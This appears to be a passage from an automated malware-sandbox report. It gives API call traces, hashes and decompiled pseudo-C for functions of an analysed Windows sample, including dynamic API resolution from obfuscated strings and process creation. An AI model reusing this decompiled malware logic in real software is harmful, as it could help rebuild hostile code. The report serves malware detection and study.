                                                          • wsprintfA.USER32 ref: 04471F94
                                                          • wsprintfA.USER32 ref: 04471FB7
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04471FC7
                                                          • wsprintfA.USER32 ref: 04471FE9
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04471FF9
                                                          • wsprintfA.USER32 ref: 04472030
                                                          • wsprintfA.USER32 ref: 04472050
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0447206D
                                                          • GetTickCount.KERNEL32 ref: 0447207D
                                                          • RtlEnterCriticalSection.NTDLL(05019570), ref: 04472091
                                                          • RtlLeaveCriticalSection.NTDLL(05019570), ref: 044720AF
                                                            • Part of subcall function 04471BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,044720C2,?,050195B0), ref: 04471BE1
                                                            • Part of subcall function 04471BB6: lstrlen.KERNEL32(?,?,?,044720C2,?,050195B0), ref: 04471BE9
                                                            • Part of subcall function 04471BB6: strcpy.NTDLL ref: 04471C00
                                                            • Part of subcall function 04471BB6: lstrcat.KERNEL32(00000000,?), ref: 04471C0B
                                                            • Part of subcall function 04471BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,044720C2,?,050195B0), ref: 04471C28
                                                          • StrTrimA.SHLWAPI(00000000,0447C28C,?,050195B0), ref: 044720E1
                                                            • Part of subcall function 0447361A: lstrlen.KERNEL32(05019A78,00000000,00000000,7742C740,044720ED,00000000), ref: 0447362A
                                                            • Part of subcall function 0447361A: lstrlen.KERNEL32(?), ref: 04473632
                                                            • Part of subcall function 0447361A: lstrcpy.KERNEL32(00000000,05019A78), ref: 04473646
                                                            • Part of subcall function 0447361A: lstrcat.KERNEL32(00000000,?), ref: 04473651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04472100
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04472107
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04472114
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04472118
                                                            • Part of subcall function 04476777: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 04476829
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04472148
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04472157
                                                          • HeapFree.KERNEL32(00000000,00000000,?,050195B0), ref: 04472166
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04472178
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04472187
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                          • String ID:
                                                          • API String ID: 3080378247-0
                                                          • Opcode ID: c3c1734406eb5185c926163fb1b3d71634bd02685951c04dfcead930ae7347f5
                                                          • Instruction ID: 29eb7f8d9076990cfea3832236cc2e86ef4149a6bd9c9cc98853258ef4678bbd
                                                          • Opcode Fuzzy Hash: c3c1734406eb5185c926163fb1b3d71634bd02685951c04dfcead930ae7347f5
                                                          • Instruction Fuzzy Hash: 8B617BB1900240AFFB219FA4EC88E9AB7E9EF48354F040515FA08D7261DB39EC079B65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04476C38, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 27%
                                                          			E04476C38(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x447d33c; // 0x5019798
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E0447A557(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x447c18c;
				}
				_t46 = E044718A5(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E0447A71F(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x447d2a8; // 0xb9a5a8
						_t16 = _t75 + 0x447eb08; // 0x530025
						 *0x447d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E0447A557(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x447c190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E0447A71F(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E0447A734(_v20);
						} else {
							_t66 =  *0x447d2a8; // 0xb9a5a8
							_t31 = _t66 + 0x447ec28; // 0x73006d
							 *0x447d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E0447A734(_v12);
				}
				return _v24;
			}




























                                                          0x04476c40
                                                          0x04476c46
                                                          0x04476c4d
                                                          0x04476c53
                                                          0x04476c57
                                                          0x04476c5b
                                                          0x04476c5e
                                                          0x04476c63
                                                          0x04476c68
                                                          0x04476c6a
                                                          0x04476c6a
                                                          0x04476c73
                                                          0x04476c78
                                                          0x04476c7d
                                                          0x04476c83
                                                          0x04476c8d
                                                          0x04476c96
                                                          0x04476c9d
                                                          0x04476cb6
                                                          0x04476cbb
                                                          0x04476cc0
                                                          0x04476cc9
                                                          0x04476cd2
                                                          0x04476ce3
                                                          0x04476cec
                                                          0x04476cf0
                                                          0x04476cf4
                                                          0x04476cf9
                                                          0x04476cfe
                                                          0x04476d00
                                                          0x04476d00
                                                          0x04476d0a
                                                          0x04476d13
                                                          0x04476d1a
                                                          0x04476d32
                                                          0x04476d36
                                                          0x04476d73
                                                          0x04476d38
                                                          0x04476d3b
                                                          0x04476d43
                                                          0x04476d54
                                                          0x04476d60
                                                          0x04476d68
                                                          0x04476d6c
                                                          0x04476d6c
                                                          0x04476d36
                                                          0x04476d7b
                                                          0x04476d80
                                                          0x04476d87

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04476C4D
                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 04476C8D
                                                          • lstrlen.KERNEL32(00000000), ref: 04476C96
                                                          • lstrlen.KERNEL32(00000000), ref: 04476C9D
                                                          • lstrlenW.KERNEL32(80000002), ref: 04476CAA
                                                          • lstrlen.KERNEL32(?,00000004), ref: 04476D0A
                                                          • lstrlen.KERNEL32(?), ref: 04476D13
                                                          • lstrlen.KERNEL32(?), ref: 04476D1A
                                                          • lstrlenW.KERNEL32(?), ref: 04476D21
                                                            • Part of subcall function 0447A734: HeapFree.KERNEL32(00000000,00000000,04475637,00000000,?,?,00000000), ref: 0447A740
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$CountFreeHeapTick
                                                          • String ID:
                                                          • API String ID: 2535036572-0
                                                          • Opcode ID: 81000aa86d58409c0efab6860d91764b16f5bf1acab101e9a1c8587be71473c8
                                                          • Instruction ID: d5d36108481e2e9c7df0e60934f14164f95d97c86ab936f1393094267b52741b
                                                          • Opcode Fuzzy Hash: 81000aa86d58409c0efab6860d91764b16f5bf1acab101e9a1c8587be71473c8
                                                          • Instruction Fuzzy Hash: 8E416C76C00209FBDF12AFA4CC489DEBBB5EF44358F154066EA04B7211DB39EA52DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04478EA1, Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 73%
                                                          			E04478EA1(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E0447592D(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E0447A749( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x447d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x447d2a8; // 0xb9a5a8
					_t18 = _t47 + 0x447e3e6; // 0x73797325
					_t68 = E04473C48(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x447d2a8; // 0xb9a5a8
						_t19 = _t50 + 0x447e747; // 0x5018cef
						_t20 = _t50 + 0x447e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E0447A62D();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E0447A62D();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x447d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E0447A734(_t70);
				goto L12;
			}


















                                                          0x04478ea9
                                                          0x04478ea9
                                                          0x04478eb8
                                                          0x04478ebf
                                                          0x04478ec4
                                                          0x04478fd1
                                                          0x04478fd8
                                                          0x04478fd8
                                                          0x04478ed3
                                                          0x04478edb
                                                          0x04478ede
                                                          0x04478ee3
                                                          0x04478ef8
                                                          0x04478efe
                                                          0x04478eff
                                                          0x04478f02
                                                          0x04478f08
                                                          0x04478f0b
                                                          0x04478f10
                                                          0x04478f18
                                                          0x04478f24
                                                          0x04478f28
                                                          0x04478fb8
                                                          0x04478f2e
                                                          0x04478f2e
                                                          0x04478f33
                                                          0x04478f3a
                                                          0x04478f4e
                                                          0x04478f52
                                                          0x04478fa1
                                                          0x04478f54
                                                          0x04478f55
                                                          0x04478f5c
                                                          0x04478f75
                                                          0x04478f77
                                                          0x04478f7b
                                                          0x04478f82
                                                          0x04478f9c
                                                          0x04478f84
                                                          0x04478f8d
                                                          0x04478f92
                                                          0x04478f92
                                                          0x04478f82
                                                          0x04478fb0
                                                          0x04478fb0
                                                          0x04478f28
                                                          0x04478fbf
                                                          0x04478fc8
                                                          0x04478fcc
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 0447592D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04478EBD,?,00000001,?,?,00000000,00000000), ref: 04475952
                                                            • Part of subcall function 0447592D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04475974
                                                            • Part of subcall function 0447592D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0447598A
                                                            • Part of subcall function 0447592D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 044759A0
                                                            • Part of subcall function 0447592D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 044759B6
                                                            • Part of subcall function 0447592D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 044759CC
                                                          • memset.NTDLL ref: 04478F0B
                                                            • Part of subcall function 04473C48: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04478F24,73797325), ref: 04473C59
                                                            • Part of subcall function 04473C48: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04473C73
                                                          • GetModuleHandleA.KERNEL32(4E52454B,05018CEF,73797325), ref: 04478F41
                                                          • GetProcAddress.KERNEL32(00000000), ref: 04478F48
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04478FB0
                                                            • Part of subcall function 0447A62D: GetProcAddress.KERNEL32(36776F57,0447A2D4), ref: 0447A648
                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04478F8D
                                                          • CloseHandle.KERNEL32(?), ref: 04478F92
                                                          • GetLastError.KERNEL32(00000001), ref: 04478F96
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                          • String ID:
                                                          • API String ID: 3075724336-0
                                                          • Opcode ID: d62d1dfac8f859064a5361949d1bd561412b099ed4fe835b49122d2e901af22b
                                                          • Instruction ID: df94ebbe9240b9da7e51a330af1faae898a1691eb5599f7802951aaf5d28fb13
                                                          • Opcode Fuzzy Hash: d62d1dfac8f859064a5361949d1bd561412b099ed4fe835b49122d2e901af22b
                                                          • Instruction Fuzzy Hash: 3E312EB2900208BFEF20AFA4DC88DDEBBB9EB44344F10456AE605B7211D735AD46CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04471BB6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 63%
                                                          			E04471BB6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x447d2a8; // 0xb9a5a8
				_t1 = _t9 + 0x447e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E0447173D(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E0447A71F(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E044764EF(_t34, _t41, _a8);
						E0447A734(_t41);
						_t42 = E04476467(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E0447A734(_t36);
							_t36 = _t42;
						}
						_t43 = E044717E5(_t36, _t33);
						if(_t43 != 0) {
							E0447A734(_t36);
							_t36 = _t43;
						}
					}
					E0447A734(_t28);
				}
				return _t36;
			}














                                                          0x04471bb6
                                                          0x04471bb9
                                                          0x04471bba
                                                          0x04471bc2
                                                          0x04471bc9
                                                          0x04471bd0
                                                          0x04471bd4
                                                          0x04471bda
                                                          0x04471be1
                                                          0x04471be6
                                                          0x04471bf8
                                                          0x04471bfc
                                                          0x04471c00
                                                          0x04471c06
                                                          0x04471c0b
                                                          0x04471c1b
                                                          0x04471c1d
                                                          0x04471c34
                                                          0x04471c38
                                                          0x04471c3b
                                                          0x04471c40
                                                          0x04471c40
                                                          0x04471c49
                                                          0x04471c4d
                                                          0x04471c50
                                                          0x04471c55
                                                          0x04471c55
                                                          0x04471c4d
                                                          0x04471c58
                                                          0x04471c58
                                                          0x04471c63

                                                          APIs
                                                            • Part of subcall function 0447173D: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,04471BD0,253D7325,00000000,00000000,7742C740,?,?,044720C2,?), ref: 044717A4
                                                            • Part of subcall function 0447173D: sprintf.NTDLL ref: 044717C5
                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,044720C2,?,050195B0), ref: 04471BE1
                                                          • lstrlen.KERNEL32(?,?,?,044720C2,?,050195B0), ref: 04471BE9
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • strcpy.NTDLL ref: 04471C00
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04471C0B
                                                            • Part of subcall function 044764EF: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04471C1A,00000000,?,?,?,044720C2,?,050195B0), ref: 04476506
                                                            • Part of subcall function 0447A734: HeapFree.KERNEL32(00000000,00000000,04475637,00000000,?,?,00000000), ref: 0447A740
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,044720C2,?,050195B0), ref: 04471C28
                                                            • Part of subcall function 04476467: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04471C34,00000000,?,?,044720C2,?,050195B0), ref: 04476471
                                                            • Part of subcall function 04476467: _snprintf.NTDLL ref: 044764CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 4ad8cfe0708a3777ffeb85ada745f2969429894169b5033d40e17f90aa743039
                                                          • Instruction ID: 69ae9a47f85a715516a562ee31447f9c7cd84a1050b6ca2bb22d3b3c25f5d5f4
                                                          • Opcode Fuzzy Hash: 4ad8cfe0708a3777ffeb85ada745f2969429894169b5033d40e17f90aa743039
                                                          • Instruction Fuzzy Hash: 8111E3779012246B6F127BF58C85CEF3BAD9E85668315012BFA00AB201DE28ED0387A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04476891, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(00000000), ref: 044768EB
                                                          • SysAllocString.OLEAUT32(0070006F), ref: 044768FF
                                                          • SysAllocString.OLEAUT32(00000000), ref: 04476911
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04476979
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04476988
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04476993
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 1be9170128e7bbdf95fb6f6fb27e4a0d22f0c817c03b9e96c73bd66eb754bc64
                                                          • Instruction ID: a327f6c45f5d01f554dd8816dd9038e453cb3794283c7fceb5ed74cb497cbb42
                                                          • Opcode Fuzzy Hash: 1be9170128e7bbdf95fb6f6fb27e4a0d22f0c817c03b9e96c73bd66eb754bc64
                                                          • Instruction Fuzzy Hash: 54418072900A09AFDF01DFB8C8446DFB7BAEF88310F154426E904EB221DA71AD06CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0447592D, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0447592D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E0447A71F(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x447d2a8; // 0xb9a5a8
					_t1 = _t23 + 0x447e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x447d2a8; // 0xb9a5a8
					_t2 = _t26 + 0x447e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E0447A734(_t54);
					} else {
						_t30 =  *0x447d2a8; // 0xb9a5a8
						_t5 = _t30 + 0x447e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x447d2a8; // 0xb9a5a8
							_t7 = _t33 + 0x447e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x447d2a8; // 0xb9a5a8
								_t9 = _t36 + 0x447e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x447d2a8; // 0xb9a5a8
									_t11 = _t39 + 0x447e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04476604(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                          0x0447593c
                                                          0x04475940
                                                          0x04475a02
                                                          0x04475946
                                                          0x04475946
                                                          0x0447594b
                                                          0x0447595e
                                                          0x04475960
                                                          0x04475965
                                                          0x0447596d
                                                          0x04475974
                                                          0x04475976
                                                          0x0447597b
                                                          0x044759fa
                                                          0x044759fb
                                                          0x0447597d
                                                          0x0447597d
                                                          0x04475982
                                                          0x0447598a
                                                          0x0447598c
                                                          0x04475991
                                                          0x00000000
                                                          0x04475993
                                                          0x04475993
                                                          0x04475998
                                                          0x044759a0
                                                          0x044759a2
                                                          0x044759a7
                                                          0x00000000
                                                          0x044759a9
                                                          0x044759a9
                                                          0x044759ae
                                                          0x044759b6
                                                          0x044759b8
                                                          0x044759bd
                                                          0x00000000
                                                          0x044759bf
                                                          0x044759bf
                                                          0x044759c4
                                                          0x044759cc
                                                          0x044759ce
                                                          0x044759d3
                                                          0x00000000
                                                          0x044759d5
                                                          0x044759db
                                                          0x044759e0
                                                          0x044759e7
                                                          0x044759ec
                                                          0x044759f1
                                                          0x00000000
                                                          0x044759f3
                                                          0x044759f6
                                                          0x044759f6
                                                          0x044759f1
                                                          0x044759d3
                                                          0x044759bd
                                                          0x044759a7
                                                          0x04475991
                                                          0x0447597b
                                                          0x04475a10

                                                          APIs
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04478EBD,?,00000001,?,?,00000000,00000000), ref: 04475952
                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04475974
                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 0447598A
                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 044759A0
                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 044759B6
                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 044759CC
                                                            • Part of subcall function 04476604: memset.NTDLL ref: 04476683
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                          • String ID:
                                                          • API String ID: 1886625739-0
                                                          • Opcode ID: 735903b9a6cab42ee955430d56ef01b48d3c86a3bff28d67401bdb510fd77050
                                                          • Instruction ID: 8c071583858f231fcfa55a84ac081294b247893332ae362c7d3532eb5ad85987
                                                          • Opcode Fuzzy Hash: 735903b9a6cab42ee955430d56ef01b48d3c86a3bff28d67401bdb510fd77050
                                                          • Instruction Fuzzy Hash: 2B2191F060060ABFEB20EF69C884D9BB7ECEF443047018566E909CB211EB34ED078B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0447853F, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E0447853F(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x447d33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E04479070( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E04476E98(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E0447A734(_a8);
						goto L29;
					}
					_t64 =  *0x447d278; // 0x5019a98
					_t16 = _t64 + 0xc; // 0x5019b66
					_t65 = E04479070(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d0447c0
						if(E044722F1(_t97,  *_t33, _t91, _a8,  *0x447d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x447d2a8; // 0xb9a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x447ea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x447e8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E04476C38(_t69,  *0x447d334,  *0x447d338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x447d2a8; // 0xb9a5a8
									_t44 = _t71 + 0x447e846; // 0x74666f53
									_t73 = E04479070(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d0447c0
										E04475D7D( *_t47, _t91, _a8,  *0x447d338, _a24);
										_t49 = _t101 + 0x10; // 0x3d0447c0
